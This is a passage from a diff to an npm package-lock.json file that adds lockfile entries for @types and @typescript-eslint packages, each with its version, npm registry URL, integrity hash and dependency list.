"sha512-XISRgDJ2Tc5q4TRqvgJtzsRkFYNJzZrhTdtMoGVBttwzzQJkPnS3WWTFc7kuDRoPtPakl+T+OfdEUjYJj7Jbow==", + "dev": true + }, + "node_modules/@types/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/@types/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-F3OznnSLAUxFrCEu/L5PY8+ny8DtcFRjx7fZZ9bycvXRi3KPTRS9HOitGZwvPg0juRhXFWIeKX58cnX5YqLohQ==", + "dependencies": { + "@types/glob": "*", + "@types/node": "*" + } + }, + "node_modules/@types/scheduler": { + "version": "0.16.2", + "resolved": "https://registry.npmjs.org/@types/scheduler/-/scheduler-0.16.2.tgz", + "integrity": "sha512-hppQEBDmlwhFAXKJX2KnWLYu5yMfi91yazPb2l+lbJiwW+wdo1gNeRA+3RgNSO39WYX2euey41KEwnqesU2Jew==" + }, + "node_modules/@types/semver": { + "version": "7.5.0", + "resolved": "https://registry.npmjs.org/@types/semver/-/semver-7.5.0.tgz", + "integrity": "sha512-G8hZ6XJiHnuhQKR7ZmysCeJWE08o8T0AXtk5darsCaTVsYZhhgUrq53jizaR2FvsoeCwJhlmwTjkXBY5Pn/ZHw==" + }, + "node_modules/@types/send": { + "version": "0.17.1", + "resolved": "https://registry.npmjs.org/@types/send/-/send-0.17.1.tgz", + "integrity": "sha512-Cwo8LE/0rnvX7kIIa3QHCkcuF21c05Ayb0ZfxPiv0W8VRiZiNW/WuRupHKpqqGVGf7SUA44QSOUKaEd9lIrd/Q==", + "dependencies": { + "@types/mime": "^1", + "@types/node": "*" + } + }, + "node_modules/@types/serve-index": { + "version": "1.9.4", + "resolved": "https://registry.npmjs.org/@types/serve-index/-/serve-index-1.9.4.tgz", + "integrity": "sha512-qLpGZ/c2fhSs5gnYsQxtDEq3Oy8SXPClIXkW5ghvAvsNuVSA8k+gCONcUCS/UjLEYvYps+e8uBtfgXgvhwfNug==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/express": "*" + } + }, + "node_modules/@types/serve-static": { + "version": "1.15.7", + "resolved": "https://registry.npmjs.org/@types/serve-static/-/serve-static-1.15.7.tgz", + "integrity": "sha512-W8Ym+h8nhuRwaKPaDw34QUkwsGi6Rc4yYqvKFo5rm2FUEhCFbzVWrxXUxuKK8TASjWsysJY0nsmNCGhCOIsrOw==", + "dependencies": { + "@types/http-errors": "*", + "@types/node": "*", + "@types/send": "*" + } + }, + "node_modules/@types/set-cookie-parser": { + "version": "2.4.7", + "resolved": "https://registry.npmjs.org/@types/set-cookie-parser/-/set-cookie-parser-2.4.7.tgz", + "integrity": "sha512-+ge/loa0oTozxip6zmhRIk8Z/boU51wl9Q6QdLZcokIGMzY5lFXYy/x7Htj2HTC6/KZP1hUbZ1ekx8DYXICvWg==", + "dev": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/shimmer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@types/shimmer/-/shimmer-1.0.2.tgz", + "integrity": "sha512-dKkr1bTxbEsFlh2ARpKzcaAmsYixqt9UyCdoEZk8rHyE4iQYcDCyvSjDSf7JUWJHlJiTtbIoQjxKh6ViywqDAg==" + }, + "node_modules/@types/simple-oauth2": { + "version": "5.0.7", + "resolved": "https://registry.npmjs.org/@types/simple-oauth2/-/simple-oauth2-5.0.7.tgz", + "integrity": "sha512-8JbWVJbiTSBQP/7eiyGKyXWAqp3dKQZpaA+pdW16FCi32ujkzRMG8JfjoAzdWt6W8U591ZNdHcPtP2D7ILTKuA==", + "dev": true + }, + "node_modules/@types/sinon": { + "version": "10.0.11", + "resolved": "https://registry.npmjs.org/@types/sinon/-/sinon-10.0.11.tgz", + "integrity": "sha512-dmZsHlBsKUtBpHriNjlK0ndlvEh8dcb9uV9Afsbt89QIyydpC7NcR+nWlAhASfy3GHnxTl4FX/aKE7XZUt/B4g==", + "dev": true, + "dependencies": { + "@types/sinonjs__fake-timers": "*" + } + }, + "node_modules/@types/sinon-chai": { + "version": "3.2.8", + "resolved": "https://registry.npmjs.org/@types/sinon-chai/-/sinon-chai-3.2.8.tgz", + "integrity": "sha512-d4ImIQbT/rKMG8+AXpmcan5T2/PNeSjrYhvkwet6z0p8kzYtfgA32xzOBlbU0yqJfq+/0Ml805iFoODO0LP5/g==", + "dev": true, + "dependencies": { + "@types/chai": "*", + "@types/sinon": "*" + } + }, + "node_modules/@types/sinonjs__fake-timers": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/@types/sinonjs__fake-timers/-/sinonjs__fake-timers-8.1.1.tgz", + "integrity": "sha512-0kSuKjAS0TrGLJ0M/+8MaFkGsQhZpB6pxOmvS3K8FYI72K//YmdfoW9X2qPsAKh1mkwxGD5zib9s1FIFed6E8g==", + "dev": true + }, + "node_modules/@types/sizzle": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/@types/sizzle/-/sizzle-2.3.3.tgz", + "integrity": "sha512-JYM8x9EGF163bEyhdJBpR2QX1R5naCJHC8ucJylJ3w9/CVBaskdQ8WqBf8MmQrd1kRvp/a4TS8HJ+bxzR7ZJYQ==", + "dev": true + }, + "node_modules/@types/sockjs": { + "version": "0.3.36", + "resolved": "https://registry.npmjs.org/@types/sockjs/-/sockjs-0.3.36.tgz", + "integrity": "sha512-MK9V6NzAS1+Ud7JV9lJLFqW85VbC9dq3LmwZCuBe4wBDgKC0Kj/jd8Xl+nSviU+Qc3+m7umHHyHg//2KSa0a0Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/superagent": { + "version": "4.1.13", + "resolved": "https://registry.npmjs.org/@types/superagent/-/superagent-4.1.13.tgz", + "integrity": "sha512-YIGelp3ZyMiH0/A09PMAORO0EBGlF5xIKfDpK74wdYvWUs2o96b5CItJcWPdH409b7SAXIIG6p8NdU/4U2Maww==", + "dev": true, + "dependencies": { + "@types/cookiejar": "*", + "@types/node": "*" + } + }, + "node_modules/@types/tedious": { + "version": "4.0.10", + "resolved": "https://registry.npmjs.org/@types/tedious/-/tedious-4.0.10.tgz", + "integrity": "sha512-lxm0D01yaVGsX5MvcM3/gFzQi7/ETSrQVs5XTiKbm6im/z+M+/Z2qFODOi93PcHh/OLouWkvpUxKShP8H4DICQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/tough-cookie": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", + "integrity": "sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==" + }, + "node_modules/@types/trusted-types": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/@types/trusted-types/-/trusted-types-2.0.7.tgz", + "integrity": "sha512-ScaPdn1dQczgbl0QFTeTOmVHFULt394XJgOQNoyVhZ6r2vLnMLJfBPd53SB52T/3G36VI1/g2MZaX0cwDuXsfw==", + "dev": true, + "optional": true + }, + "node_modules/@types/uuid": { + "version": "9.0.8", + "resolved": "https://registry.npmjs.org/@types/uuid/-/uuid-9.0.8.tgz", + "integrity": "sha512-jg+97EGIcY9AGHJJRaaPVgetKDsrTgbRjQ5Msgjh/DQKEFl0DtyRr/VCOyD1T2R1MNeWPK/u7JoGhlDZnKBAfA==", + "dev": true + }, + "node_modules/@types/validator": { + "version": "13.7.15", + "resolved": "https://registry.npmjs.org/@types/validator/-/validator-13.7.15.tgz", + "integrity": "sha512-yeinDVQunb03AEP8luErFcyf/7Lf7AzKCD0NXfgVoGCCQDNpZET8Jgq74oBgqKld3hafLbfzt/3inUdQvaFeXQ==" + }, + "node_modules/@types/warning": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@types/warning/-/warning-3.0.3.tgz", + "integrity": "sha512-D1XC7WK8K+zZEveUPY+cf4+kgauk8N4eHr/XIHXGlGYkHLud6hK9lYfZk1ry1TNh798cZUCgb6MqGEG8DkJt6Q==", + "dev": true + }, + "node_modules/@types/webidl-conversions": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/@types/webidl-conversions/-/webidl-conversions-7.0.3.tgz", + "integrity": "sha512-CiJJvcRtIgzadHCYXw7dqEnMNRjhGZlYK05Mj9OyktqV8uVT8fD2BFOB7S1uwBE3Kj2Z+4UyPmFw/Ixgw/LAlA==" + }, + "node_modules/@types/whatwg-url": { + "version": "11.0.5", + "resolved": "https://registry.npmjs.org/@types/whatwg-url/-/whatwg-url-11.0.5.tgz", + "integrity": "sha512-coYR071JRaHa+xoEvvYqvnIHaVqaYrLPbsufM9BF63HkwI5Lgmy2QR8Q5K/lYDYo5AK82wOvSOS0UsLTpTG7uQ==", + "dependencies": { + "@types/webidl-conversions": "*" + } + }, + "node_modules/@types/workerpool": { + "version": "6.4.7", + "resolved": "https://registry.npmjs.org/@types/workerpool/-/workerpool-6.4.7.tgz", + "integrity": "sha512-DI2U4obcMzFViyNjLw0xXspim++qkAJ4BWRdYPVMMFtOpTvMr6PAk3UTZEoSqnZnvgUkJ3ck97Ybk+iIfuJHMg==", + "dev": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/ws": { + "version": "8.18.1", + "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz", + "integrity": "sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/xml-crypto": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/@types/xml-crypto/-/xml-crypto-1.4.5.tgz", + "integrity": "sha512-rHc0tlw/ixu7PCqqlpmP9KDIA79IsoV+HFnhJDsdS4MkVAEhBNaazXjv92Xf9oYjWp9e4His4Qzo8fOzoTjT+Q==", + "dependencies": { + "@types/node": "*", + "xpath": "0.0.27" + } + }, + "node_modules/@types/xml-crypto/node_modules/xpath": { + "version": "0.0.27", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.27.tgz", + "integrity": "sha512-fg03WRxtkCV6ohClePNAECYsmpKKTv5L8y/X3Dn1hQrec3POx2jHZ/0P2qQ6HvsrU1BmeqXcof3NGGueG6LxwQ==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/@types/xml-encryption": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@types/xml-encryption/-/xml-encryption-1.2.4.tgz", + "integrity": "sha512-I69K/WW1Dv7j6O3jh13z0X8sLWJRXbu5xnHDl9yHzUNDUBtUoBY058eb5s+x/WG6yZC1h8aKdI2EoyEPjyEh+Q==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/xml2js": { + "version": "0.4.14", + "resolved": "https://registry.npmjs.org/@types/xml2js/-/xml2js-0.4.14.tgz", + "integrity": "sha512-4YnrRemBShWRO2QjvUin8ESA41rH+9nQGLUGZV/1IDhi3SL9OhdpNC/MrulTWuptXKwhx/aDxE7toV0f/ypIXQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/yargs": { + "version": "17.0.24", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", + "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", + "dev": true, + "dependencies": { + "@types/yargs-parser": "*" + } + }, + "node_modules/@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true + }, + "node_modules/@types/yauzl": { + "version": "2.9.2", + "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.9.2.tgz", + "integrity": "sha512-8uALY5LTvSuHgloDVUvWP3pIauILm+8/0pDMokuDYIoNsOkSwd5AiHBTSEJjKTDcZr5z8UpgOWZkxBF4iJftoA==", + "dev": true, + "optional": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@typescript-eslint/eslint-plugin": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/eslint-plugin/-/eslint-plugin-8.0.1.tgz", + "integrity": "sha512-5g3Y7GDFsJAnY4Yhvk8sZtFfV6YNF2caLzjrRPUBzewjPCaj0yokePB4LJSobyCzGMzjZZYFbwuzbfDHlimXbQ==", + "dev": true, + "dependencies": { + "@eslint-community/regexpp": "^4.10.0", + "@typescript-eslint/scope-manager": "8.0.1", + "@typescript-eslint/type-utils": "8.0.1", + "@typescript-eslint/utils": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "graphemer": "^1.4.0", + "ignore": "^5.3.1", + "natural-compare": "^1.4.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "@typescript-eslint/parser": "^8.0.0 || ^8.0.0-alpha.0", + "eslint": "^8.57.0 || ^9.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/@typescript-eslint/scope-manager": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.0.1.tgz", + "integrity": "sha512-NpixInP5dm7uukMiRyiHjRKkom5RIFA4dfiHvalanD2cF0CLUuQqxfg8PtEUo9yqJI2bBhF+pcSafqnG3UBnRQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/parser": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-8.0.1.tgz", + "integrity": "sha512-5IgYJ9EO/12pOUwiBKFkpU7rS3IU21mtXzB81TNwq2xEybcmAZrE9qwDtsb5uQd9aVO9o0fdabFyAmKveXyujg==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "8.0.1", + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/typescript-estree": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/scope-manager": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.0.1.tgz", + "integrity": "sha512-NpixInP5dm7uukMiRyiHjRKkom5RIFA4dfiHvalanD2cF0CLUuQqxfg8PtEUo9yqJI2bBhF+pcSafqnG3UBnRQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.0.1.tgz", + "integrity": "sha512-8V9hriRvZQXPWU3bbiUV4Epo7EvgM6RTs+sUmxp5G//dBGy402S7Fx0W0QkB2fb4obCF8SInoUzvTYtc3bkb5w==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/@typescript-eslint/parser/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@typescript-eslint/parser/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/scope-manager": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-6.21.0.tgz", + "integrity": "sha512-OwLUIWZJry80O99zvqXVEioyniJMa+d2GrqpUTqi5/v5D5rOrppJVBPa0yKCblcigC0/aYAzxxqQ1B+DS2RYsg==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "6.21.0", + "@typescript-eslint/visitor-keys": "6.21.0" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/type-utils/-/type-utils-8.0.1.tgz", + "integrity": "sha512-+/UT25MWvXeDX9YaHv1IS6KI1fiuTto43WprE7pgSMswHbn1Jm9GEM4Txp+X74ifOWV8emu2AWcbLhpJAvD5Ng==", + "dev": true, + "dependencies": { + "@typescript-eslint/typescript-estree": "8.0.1", + "@typescript-eslint/utils": "8.0.1", + "debug": "^4.3.4", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.0.1.tgz", + "integrity": "sha512-8V9hriRvZQXPWU3bbiUV4Epo7EvgM6RTs+sUmxp5G//dBGy402S7Fx0W0QkB2fb4obCF8SInoUzvTYtc3bkb5w==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/type-utils/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": 